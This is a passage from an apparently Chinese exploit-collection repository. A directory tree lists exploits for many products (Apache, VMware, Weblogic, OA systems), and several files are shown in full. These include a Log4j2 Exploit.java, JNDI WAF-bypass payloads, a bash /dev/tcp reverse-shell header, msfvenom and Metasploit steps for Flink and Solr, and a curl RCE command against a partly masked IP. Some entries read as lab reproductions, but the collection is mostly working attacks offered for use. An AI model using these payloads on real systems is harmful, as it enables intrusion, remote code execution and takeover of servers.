├── .gitignore ├── Apache ├── Apache APISIX Dashboard未授权导入配置文件RCE漏洞(CVE-2021-45232) │ ├── apisix-dashboard-rce-batch-detect.py │ └── readme.md ├── Apache ActiveMQ POC │ └── readme.md ├── Apache Flink任意jar包上传漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── readme.md ├── Apache Log4j2 RCE漏洞复现(CVE-2021-44228) │ ├── Exploit.java │ ├── pic │ │ ├── Lookups.png │ │ ├── calc.png │ │ └── mindmap.png │ └── readme.md ├── Apache Log4j2 RCE靶场复现(CVE-2021-44228) │ ├── image │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png │ └── readme.md ├── Apache Shiro POC │ └── readme.md ├── Apache Solr远程代码执行漏洞(CVE-2019-12409) │ ├── 1.png │ ├── 2.png │ └── readme.md ├── Apache Spark远程命令执行漏洞(暂无编号) │ ├── Exploit.jar │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md └── Apache httpd路径遍历及RCE漏洞(CVE-2021-41773) │ ├── pic │ ├── 1.png │ ├── 2.png │ └── readme.md │ └── readme.md ├── Atlassian ├── Atlassian Confluence远程代码执行漏洞(CVE-2021-26084) │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md └── Atlassian Jira POC │ ├── Unauthenticated_JIRA_CVEs_to_Exploit.txt │ ├── Unauthenticated_JIRA_CVEs_to_Exploit.xmind │ └── readme.md ├── Citrix ├── Citrix XenMobile目录遍历漏洞(CVE-2020-8209) │ ├── 0.png │ ├── 1.png │ └── readme.md └── Citrix远程代码执行漏洞(CVE-2019-19781) │ ├── 0.png │ ├── CVE-2019-19781.zip │ └── readme.md ├── D-Link └── D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078) │ ├── pic │ ├── 0.png │ └── readme.md │ └── readme.md ├── Discuz └── Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号) │ ├── 0.png │ └── readme.md ├── Drupal └── Drupal远程代码执行漏洞(CVE-2018-7600) │ ├── 0.png │ ├── drupalggedon2.rb │ └── readme.md ├── Fastjson └── Fastjson漏洞集合.md ├── GeoServer └── GeoServer CVE-2024-36401漏洞复现及武器化 │ ├── GeoServer CVE-2024-36401漏洞复现及武器化.md │ └── images │ ├── 01.png │ ├── 02.png │ ├── 03.png │ ├── 04.png │ ├── 05.png │ ├── 06.png │ └── 07.png ├── Git └── Git泄漏漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ ├── GitHack-master.zip │ └── readme.md ├── GitLab └── GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205) │ ├── pic │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── a.png │ └── readme.md │ └── readme.md ├── Google ├── Google Chrome 0day漏洞(暂无编号) │ ├── exploit.html │ ├── pic │ │ ├── 0.png │ │ ├── 1.png │ │ └── readme.md │ └── readme.md └── Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号) │ ├── pic │ ├── 0.png │ ├── 1.png │ ├── 2.png │ └── readme.md │ ├── readme.md │ └── wechat-exploit.html ├── JBOSS ├── JBoss漏洞集合.md └── pic │ └── 01.png ├── JDWP └── JDWP远程代码执行漏洞(暂无编号) │ ├── pic │ ├── 1.png │ └── readme.md │ └── readme.md ├── JumpServer ├── JumpServer任意用户密码重置(CVE-2023-42820) │ ├── 01.png │ └── JumpServer任意用户密码重置(CVE-2023-42820).md └── JumpServer远程代码执行漏洞(暂无编号) │ ├── 0.png │ ├── a0.png │ ├── a1.png │ ├── jumpserver-rce.py │ ├── quick_start.sh │ └── readme.md ├── Jupyter Notebook └── Jupyter Notebook未授权访问导致RCE漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ └── readme.md ├── Kubernetes └── Kubernetes容器逃逸漏洞(CVE-2022-0185)【记录】 │ └── readme.md ├── Microsoft ├── Microsoft IIS6.0远程代码执行漏洞(CVE-2017-7269) │ └── readme.md ├── Microsoft RDP远程代码执行漏洞(CVE-2019-0708) │ ├── cve_2019_0708_bluekeep.rb │ ├── cve_2019_0708_bluekeep_rce.rb │ ├── rdp.rb │ ├── rdp_scanner.rb │ └── readme.md ├── Microsoft SharePoint漏洞集合.md └── Microsoft Word远程代码执行漏洞(CVE-2021-40444) │ ├── document.docx │ ├── pic │ ├── 1.png │ └── readme.md │ └── readme.md ├── Moeditor └── Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号) │ ├── pic │ ├── 0.png │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── a.png │ └── readme.md │ └── readme.md ├── PHPMailer └── PHPMailer远程命令执行漏洞(CVE-2016-10033) │ ├── 0.png │ └── readme.md ├── PHPStudy └── PHPStudy后门漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ └── readme.md ├── PHPUnit └── PHPUnit远程代码执行漏洞(CVE-2017-9841) │ ├── 0.png │ ├── 1.png │ └── readme.md ├── PHP内置服务器 ├── 01.png └── PHP源码读取漏洞复现.md ├── README.assets ├── awvs.png ├── goby.png └── xray.png ├── README.md ├── Redis └── Redis RCE复现及简单分析(CVE-2022-0543) │ ├── pic │ └── 01.png │ └── readme.md ├── SonicWall └── SonicWall SSL-VPN远程命令执行漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ ├── batch-detect.py │ ├── readme.md │ └── urls.txt ├── Spring ├── Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947) │ ├── cve-2022-22947.py │ ├── image │ │ ├── 01.png │ │ └── 02.png │ └── readme.md └── Spring Core RCE 0day漏洞复现 │ ├── pic │ ├── 01.png │ ├── 02.png │ └── 03.png │ └── readme.md ├── Struts2 ├── Struts2 S2-045远程代码执行漏洞(CVE-2017-5638) │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md └── Struts2 S2-061远程代码执行漏洞(CVE-2020-17530) │ ├── 0.png │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── readme.md │ ├── s2-061-batch-detect-exp.py │ └── s2-061-batch-detect.py ├── Supervisord └── Supervisord远程代码执行漏洞(CVE-2017-11610) │ ├── 0.png │ ├── poc.py │ └── readme.md ├── ThinkPHP ├── OneThink前台登录绕过.md ├── ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540) │ ├── 0.png │ ├── 1.png │ ├── 2.png │ └── readme.md ├── ThinkCMF远程代码执行漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ ├── ThinkCMFX_2.2.3.zip │ └── readme.md ├── ThinkPHP 3.2.x远程代码执行 │ ├── image │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png │ └── readme.md └── ThinkPHP远程命令执行漏洞(暂无编号) │ ├── 0.png │ ├── readme.md │ └── thinkphp版本总结.txt ├── Tomcat ├── Tomcat AJP本地文件包含漏洞(CNVD-2020-10487) │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735) │ ├── a0.png │ ├── a1.png │ ├── a2.png │ ├── a3.png │ ├── a4.png │ ├── catalina-jmx-remote.jar │ ├── groovy-2.3.9.jar │ └── readme.md ├── Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935) │ ├── WebSocketClient.js │ ├── WebSocketServlet.java │ ├── a.png │ ├── a0.png │ ├── a1.png │ ├── a2.png │ ├── a3.png │ ├── b.png │ ├── c.png │ ├── d.png │ ├── e.png │ ├── f.png │ ├── readme.md │ └── tcdos └── Tomcat任意文件写入漏洞(CVE-2017-12615) │ ├── f0.png │ ├── f1.png │ └── readme.md ├── VMWare ├── VMWare vCenter Server后利用 │ └── readme.md ├── VMware ESXi CVE-2024-37085 │ └── VMware ESXi CVE-2024-37085漏洞验证分析.html ├── VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972) │ ├── Sp4ce │ │ ├── CVE-2021-21972 │ │ │ ├── CVE-2021-21972.py │ │ │ ├── README.md │ │ │ ├── img │ │ │ │ ├── 1.png │ │ │ │ ├── 2.png │ │ │ │ └── 3.png │ │ │ └── payload │ │ │ │ ├── Linux.tar │ │ │ │ ├── Linux │ │ │ │ └── shell.jsp │ │ │ │ └── Windows.tar │ │ └── start.sh │ ├── horizon3ai │ │ ├── CVE-2021-21972 │ │ │ ├── CVE-2021-21972-Unix-Proof.png │ │ │ ├── CVE-2021-21972-Windows-Proof.png │ │ │ ├── CVE-2021-21972.py │ │ │ ├── LICENSE │ │ │ ├── README.md │ │ │ ├── Windows-Exec.png │ │ │ └── cmdjsp.jsp │ │ ├── exploit.tar │ │ └── start-for-unix.sh │ ├── pic │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── readme.md │ ├── readme.md │ └── vCenter任意文件上传-batch-detect.py └── VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】 │ ├── readme.md │ └── 版本比对表备份 │ ├── Build numbers and versions of VMware ESXi_ESX (2143832).html │ └── Build numbers and versions of VMware ESXi_ESX (2143832)_files │ ├── 3T3E3J57XBHLNN2SF6MDM3 │ ├── 948778211914991 │ ├── CoveoFullSearch.css │ ├── KM_Article_Detail_Page_CSS │ ├── KM_Article_Detail_Page_JS │ ├── KM_Segment_Track_Script │ ├── KM_VMware_Logo │ ├── OSU6T4K5BNEFDBKAQHSKNI │ ├── analytics.min.js.下载 │ ├── app.css │ ├── app.js.下载 │ ├── aura_prod.js.下载 │ ├── bootstrap.js.下载 │ ├── ctx.v1.1.min.js.下载 │ ├── d3711f7 │ ├── dest5.html │ ├── emAwdj8B │ ├── facebookv2.svg │ ├── fbevents.js.下载 │ ├── fonts.css │ ├── fpconsent.js.下载 │ ├── hm.js.下载 │ ├── index.js(1).下载 │ ├── index.js.下载 │ ├── insight.min.js.下载 │ ├── ip.js(1).下载 │ ├── ip.js.下载 │ ├── jquery.min.js.下载 │ ├── linkedInv2.svg │ ├── location │ ├── munchkin.js(1).下载 │ ├── munchkin.js.下载 │ ├── otBannerSdk.js.下载 │ ├── otSDKStub.js.下载 │ ├── out │ ├── out(1) │ ├── out(10) │ ├── out(11) │ ├── out(2) │ ├── out(3) │ ├── out(4) │ ├── out(5) │ ├── out(6) │ ├── out(7) │ ├── out(8) │ ├── out(9) │ ├── resources.js.下载 │ ├── roundtrip.js.下载 │ ├── s35343704056299 │ ├── saved_resource.html │ ├── search.style.css │ ├── sendrolling.js.下载 │ ├── styles.css │ ├── twitterv2.svg │ ├── utag.364.js.下载 │ ├── utag.437.js.下载 │ ├── utag.439.js.下载 │ ├── utag.440.js.下载 │ ├── utag.441.js.下载 │ ├── utag.js.下载 │ ├── utag.sync.js.下载 │ ├── utag_data.js.下载 │ ├── vmware-elements-scripts.js.下载 │ ├── vmware-elements.js.下载 │ └── youtubev2.svg ├── Weblogic ├── WebLogic后台命令执行漏洞(CVE-2021-2109) │ ├── 0.png │ └── readme.md ├── Weblogic前台验证绕过+后台命令执行漏洞复现(CVE-2020-14882、CVE-2020-14883) │ └── readme.md └── Weblogic前台验证绕过漏洞复现(CVE-2020-14750) │ └── readme.md ├── Webmin └── Webmin远程命令执行漏洞(CVE-2019-15107) │ ├── 0.png │ ├── 1.png │ └── readme.md ├── XMind └── XMind 2020 XSS漏洞(暂无编号) │ ├── pic │ ├── a0.png │ └── readme.md │ └── readme.md ├── Zabbix └── Zabbix SAML SSO Login Bypass(CVE-2022-23131) │ ├── pic │ └── 1.png │ ├── readme.md │ └── 【利用脚本】Zabbix凭证绕过捅漂亮国菊花.html ├── 亿邮 └── 亿邮远程命令执行漏洞(CNVD-2021-26422) │ ├── EYouMailRCE-Batch-Detect.py │ ├── pic │ ├── 0.png │ ├── 1.png │ └── readme.md │ └── readme.md ├── 向日葵 └── 向日葵 RCE漏洞(CNVD-2022-10270、CNVD-2022-03672) │ ├── image │ ├── 01.png │ ├── 02.png │ └── 03.png │ └── readme.md ├── 天擎 ├── 360天擎SQL注入漏洞(暂无编号) │ ├── 360天擎-SQL注入-Vuln-Batch-Detect.py │ ├── pic │ │ ├── 0.png │ │ └── readme.md │ └── readme.md ├── 360天擎越权访问导致数据库信息泄露漏洞(暂无编号) │ ├── 360天擎-越权访问导致数据库信息泄露-Vuln-Batch-Detect.py │ ├── pic │ │ ├── 0.png │ │ ├── 1.png │ │ └── readme.md │ └── readme.md └── X擎Getshell后登录后台技巧.pdf ├── 帆软 └── FineReport漏洞集合.md ├── 微信 └── 微信绕过“请在微信客户端打开链接”限制漏洞(暂无编号) │ ├── 0.png │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── readme.md ├── 泛微 └── 泛微OA漏洞集合.md ├── 深信服 └── 深信服应用报表交付系统-漏洞利用WAF绕过.md ├── 用友 ├── 用友NC目录遍历漏洞(暂无编号) │ ├── pic │ │ ├── 0.png │ │ ├── 1.png │ │ └── readme.md │ ├── readme.md │ └── 用友NC-FileRead-Vuln-Batch-Detect.py └── 用友NC远程命令执行漏洞(CNVD-2021-30167) │ ├── YonYouNC-vuln-scan.py │ └── readme.md ├── 网康 └── 网康NS-NGFW前台RCE漏洞(暂无编号) │ ├── pic │ ├── 0.png │ ├── 1.png │ ├── 2.png │ └── readme.md │ ├── readme.md │ └── 网康NS-NGFW-RCE-Batch-Detect.py ├── 蓝凌 └── 蓝凌OA漏洞集合.md ├── 通达 ├── 通达OA前台任意用户登录漏洞(暂无编号) │ ├── pic │ │ ├── 01.png │ │ └── 02.png │ └── readme.md └── 通达OA未授权访问+文件上传导致RCE漏洞(暂无编号) │ ├── 0.png │ └── readme.md ├── 锐捷 └── 锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(暂无编号) │ └── readme.md └── 齐治 └── 奇治堡垒机任意用户登录漏洞(暂无编号) ├── pic ├── 0.png ├── 1.png └── readme.md ├── readme.md └── 齐治堡垒机-任意用户登录-Vuln-Batch-Detect.py /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store -------------------------------------------------------------------------------- /Apache/Apache APISIX Dashboard未授权导入配置文件RCE漏洞(CVE-2021-45232)/readme.md: -------------------------------------------------------------------------------- 1 | 2 | ### FOFA 3 | title="Apache APISIX Dashboard" 4 | 5 | ### 检测 6 | 工具支持单目标或批量检测,具体用法见工具 7 | 8 | ### 利用 9 | 注意:利用时的端口号不再是9000,而是9080 10 | curl http://114.67.xx.xx:9080/4ra7NZ -H "cmd: ls -alh" 11 | -------------------------------------------------------------------------------- /Apache/Apache ActiveMQ POC/readme.md: -------------------------------------------------------------------------------- 1 | # 任意文件写入漏洞 getshell(CVE-2016-3088) 2 | ``` 3 | 需要可以访问如下接口 4 | /admin 5 | /api 6 | fileserver 7 | ``` 8 | 9 | # 参考链接 10 | https://www.freebuf.com/vuls/284919.html -------------------------------------------------------------------------------- /Apache/Apache Flink任意jar包上传漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /Apache/Apache Flink任意jar包上传漏洞(暂无编号)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/1.png -------------------------------------------------------------------------------- /Apache/Apache Flink任意jar包上传漏洞(暂无编号)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/2.png -------------------------------------------------------------------------------- /Apache/Apache Flink任意jar包上传漏洞(暂无编号)/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/3.png -------------------------------------------------------------------------------- /Apache/Apache Flink任意jar包上传漏洞(暂无编号)/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/4.png -------------------------------------------------------------------------------- /Apache/Apache Flink任意jar包上传漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:本地搭建的环境 3 | 复现版本:Flink 1.9.1 4 | 5 | # 0x01 环境搭建 6 | 目标环境:centos7_x64_en-us + flink-1.9.1-bin-scala_2.11.tgz + openjdk version "1.8.0_181" 7 | 8 | wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz 9 | tar -xvf ./flink-1.9.1-bin-scala_2.11.tgz 10 | cd ./flink-1.9.1/bin/ 11 | ./start-cluster.sh 12 | 查看端口8081是否开启,如下图 13 | ![image](./0.png) 14 | 浏览器访问,出现下图所示,表示成功启动 15 | ![image](./1.png) 16 | 17 | # 0x02 利用条件 18 | 无 19 | 20 | # 0x03 影响版本 21 | Flink <= 1.9.1 22 | 23 | # 0x04 漏洞复现 24 | 攻击环境:kali2020 + msf5 25 | 26 | msfvenom -p java/meterpreter/reverse_tcp lhost=172.16.35.128 lport=9999 -o text.jar 27 | msfconsole 28 | use exploit/multi/handler 29 | set payload java/meterpreter/reverse_tcp 30 | set lhost 172.16.35.128 31 | set lport 9999 32 | run 33 | 浏览器访问http://172.16.35.131:8081/ 后点击下图所示 34 | ![image](./2.png) 35 | 再点击下图所示 36 | ![image](./3.png) 37 | 此时,meterpreter已经收到session,如下图 38 | ![image](./4.png) 39 | 40 | # 0x05 踩坑记录 41 | 无 42 | 43 | # 0x06 参考链接 44 | 无 45 | -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/Exploit.java: -------------------------------------------------------------------------------- 1 | import java.io.BufferedReader; 2 | import java.io.IOException; 3 | import java.io.InputStream; 4 | import java.io.InputStreamReader; 5 | import java.io.Reader; 6 | import javax.print.attribute.standard.PrinterMessageFromOperator; 7 | 8 | public class Exploit { 9 | 10 | public Exploit() throws IOException, InterruptedException { 11 | String cmd = "calc"; 12 | final Process process = Runtime.getRuntime().exec(cmd); 13 | printMessage( process.getInputStream() ); 14 | printMessage( process.getErrorStream() ); 15 | int value = process.waitFor(); 16 | System.out.println(value); 17 | } 18 | 19 | private static void printMessage(final InputStream input) { 20 | // TODO Auto-generated method stub 21 | new Thread (new Runnable() { 22 | @Override 23 | public void run() { 24 | // TODO Auto-generated method stub 25 | Reader reader = new InputStreamReader(input); 26 | BufferedReader bf = new BufferedReader(reader); 27 | String line = null; 28 | try { 29 | while ((line=bf.readLine())!=null) 30 | { 31 | System.out.println(line); 32 | } 33 | } catch (IOException e) { 34 | e.printStackTrace(); 35 | } 36 | } 37 | }).start(); 38 | } 39 | 40 | } -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/Lookups.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/Lookups.png -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/calc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/calc.png -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/mindmap.png -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/readme.md: -------------------------------------------------------------------------------- 1 | ### 0x01 漏洞原理 2 | 用我的理解简单概括一下 3 | log4j2在输出到日志的时候除了支持常见的变量替换还支持获取远程内容,获取远程内容由Lookups功能提供 4 | ``` 5 | # 变量替换 6 | logger.info("user name: {}, alias name: {}", userName, aliasName) 7 | ``` 8 | 获取远程内容支持多种维度,其中就包括jndi,如下图 9 | ![image](./pic/Lookups.png) 10 | jndi简单讲就是一个类似于字典的数据集,传入名称,获取对应的对象,不过jndi还有一个危险的特性,就是可获取远程class或远程class的地址,加载到本地后通过classloader执行,这个时候如果用户传入一个包含恶意class的地址,则会导致服务器执行恶意代码,具体利用的话需要结合jndi支持的协议,jndi支持ladp、rmi、corba、dns四种协议,利用思路如下图 11 | ![image](./pic/mindmap.png) 12 | 13 | 14 | ### 0x02 漏洞复现 15 | 1、javac.exe .\Exploit.java 16 | 2、python3.exe -m http.server 8800 17 | 3、java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8800/#Exploit 18 | 19 | 4、结果如下图 20 | ![image](./pic/calc.png) 21 | 22 | ### 参考链接 23 | https://zhuanlan.zhihu.com/p/445646703h 24 | https://drun1baby.github.io/2022/07/28/Java反序列化之JNDI学习/ -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/01.png -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/02.png -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/03.png -------------------------------------------------------------------------------- /Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/readme.md: -------------------------------------------------------------------------------- 1 | ### 0x01 waf绕过原理 2 | 上一篇漏洞复现中讲了下漏洞原理,这篇靶场复现在复现前先讲一下waf绕过原理,首先说明下2.15.0-rc1开始,默认关闭了Lookups功能,需要修改配置才能结合各种绕过方式,所以意义不大,2.16.0开始,移除了Lookups功能,然后在受影响版本2.0-beta9 <= 版本 <= 2.14.1中,由于waf多拦截jndi等关键字,可通过如下几种方式进行绕过 3 | ``` 4 | :- 是一个赋值关键字,如果程序处理到 ${aaaa:-bbbb} 这样的字符串,处理的结果将会是 bbbb,借助此特性,可构造如下waf绕过 5 | logg.info("${${::-J}ndi:ldap://127.0.0.1:1389/Calc}"); 6 | 7 | 8 | Lookups中除了jndi还存在Upper、Lower等方式,可变换大小写,可构造如下waf绕过 9 | logg.info("${${lower:J}ndi:ldap://127.0.0.1:1389/Calc}"); 10 | logg.info("${${upper:j}ndi:ldap://127.0.0.1:1389/Calc}"); 11 | 12 | 13 | 同时也可以利用一些特殊字符的大小写转化的问题 14 | ı => upper => i (Java 中测试可行) 15 | ſ => upper => S (Java 中测试可行) 16 | İ => upper => i (Java 中测试不可行) 17 | K => upper => k (Java 中测试不可行) 18 | logg.error("${jnd${upper:ı}:ldap://127.0.0.1:1389/Calc}"); 19 | 20 | 21 | 现在数据传输很多都是 json 形式,所以在 json 中我们也可以进行尝试 22 | 像 Jackson 和 fastjson 又有 unicode 和 hex 的编码特性,所以就可以尝试编码绕过 23 | {"key":"\u0024\u007b"} 24 | {"key":"\x24\u007b"} 25 | ``` 26 | 27 | ### 0x02 靶场复现 28 | 想参照这篇文章复现一下log4j2反弹shell 29 | https://blog.csdn.net/m0_56773673/article/details/122300927 30 | 31 | 本想使用vulfocus的在线靶场(vulfocus/log4j2-rce-2021-12-09:1),结果环境启动后,payload打一下,环境崩一下,好不容易环境不崩了,payload放到get请求里,返回400,payload放到post请求里,返回405,心好累,还是参照复现文章中的环境自己搭吧 32 | 参见:https://blog.csdn.net/weixin_47019868/article/details/122010972 33 | 34 | 使用kali系统,apt update发现非常慢,先更新下源 35 | 参见:https://blog.csdn.net/qq_33331244/article/details/114656949 36 | 37 | docker pull vulfocus/log4j2-rce-2021-12-09的时候非常慢,等了好半天都不行,突然想到,是不是docker镜像源的问题,修改镜像源后,不到1分钟就pull完成 38 | 修改镜像源参见:https://blog.csdn.net/qq_29924795/article/details/104483435 39 | 40 | 本地搭建完环境,发现环境和在线靶场一样,并不是文章中的环境,难道docker镜像升级了,我靠。。 41 | 42 | 环境就这样了,还是想想payload怎么打吧,payload放入get请求中返回400,payload放入post请求中返回405,还是不行啊,查阅下vulfocus这个靶场别人怎么打的,突然发现,payload是放入get请求中,但需要url编码下,我怎么忘记url编码了,大脑好迟钝 43 | 参见:https://blog.csdn.net/weixin_45632448/article/details/124149561 44 | 45 | 赶紧改成url编码的形式测试一下,结果还是不行,测了几次,都是不行,突然想到,是不是本地的docker镜像不出网啊,进入docker镜像内,发现各种命令都被阉割了,心再次好累。。 46 | 47 | 还是用在线靶场试一下吧,如果在线靶场可以,那应该就是本地docker镜像不出网,启动在线靶场,打了一下,dns平台收到请求了,天啦撸,终于行啦 48 | ![image](./image/01.png) 49 | 50 | 折腾了一圈,最后用的还是在线靶场。。。不过还好,这过程也学到不少 51 | 52 | 经测试,如下三种形式payload都可以 53 | ``` 54 | ${jndi:ldap://de63d35d.dns.1433.eu.org/ttt} 55 | ${jndi:ldap://de63d35d.dns.1433.eu.org/} 56 | ${jndi:ldap://de63d35d.dns.1433.eu.org} 57 | ``` 58 | 59 | 下面尝试执行命令,服务端执行 60 | ``` 61 | java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 0.0.0.0 -l 1389 -p 3456 62 | ``` 63 | 其中JNDIExploit-1.2-SNAPSHOT.jar是魔改过的(也可以使用:[https://github.com/welk1n/JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)) 64 | 65 | payload处执行如下(这是一个有回显的payload) 66 | ``` 67 | ${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho} 68 | ``` 69 | 并添加一个http头 70 | ``` 71 | WWW-Authenticate: whoami 72 | ``` 73 | 可以看到成功执行了命令 74 | ![image](./image/02.png) 75 | 76 | 尝试反弹shell 77 | ``` 78 | WWW-Authenticate: bash -c 'exec bash -i & >/dev/tcp/0.0.0.0/1234 <&1' 79 | ``` 80 | 可以看到,成功反弹了shell 81 | ![image](./image/03.png) 82 | 83 | 有精力还可以看一下如下2篇log4j2的靶场和漏洞复现: 84 | https://buaq.net/go-111996.html 85 | https://www.cnblogs.com/CHOSEN1-Z13/p/16001961.html 86 | 87 | 使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar会更好用(https://github.com/welk1n/JNDI-Injection-Exploit) 88 | 参见这篇博客:https://www.cnblogs.com/CHOSEN1-Z13/p/16001961.html 89 | 90 | ### 参考链接 91 | https://www.freebuf.com/articles/web/341857.html 92 | https://www.freebuf.com/articles/web/344076.html 93 | https://nosec.org/home/detail/4920.html -------------------------------------------------------------------------------- /Apache/Apache Shiro POC/readme.md: -------------------------------------------------------------------------------- 1 | 可通过j1anFen师傅的工具检测,地址:https://github.com/j1anFen/shiro_attack 2 | 3 | 飞鸿师傅的工具检测,地址:https://github.com/feihong-cs/ShiroExploit-Deprecated/ -------------------------------------------------------------------------------- /Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/1.png -------------------------------------------------------------------------------- /Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/2.png -------------------------------------------------------------------------------- /Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:本地搭建的环境 3 | 复现版本:Solr 8.2.0 4 | 5 | # 0x01 环境搭建 6 | 目标环境:centos7_x64_en-us + solr-8.2.0.tgz + openjdk version "1.8.0_181" 7 | wget https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz 8 | tar -xvf ./solr-8.2.0.tgz 9 | cd ./solr-8.2.0.tgz/bin/ 10 | ./solr start -force#默认启动端口8983 11 | 启动后浏览器访问http://127.0.0.1:8983/ ,出现下图所示表示环境配置完成: 12 | ![image](./1.png) 13 | 14 | # 0x02 利用条件 15 | 无 16 | 17 | # 0x03 影响版本 18 | Solr 8.1.1 19 | Solr 8.2.0 20 | 21 | # 0x04 漏洞复现 22 | 攻击环境:kali2020 + msf5 23 | msfconsole 24 | use exploit/multi/misc/java_jmx_server 25 | set rhosts 172.16.35.138 26 | set rport 18983 27 | run 28 | ![image](./2.png) 29 | 30 | # 0x05 踩坑记录 31 | 坑1: 32 | 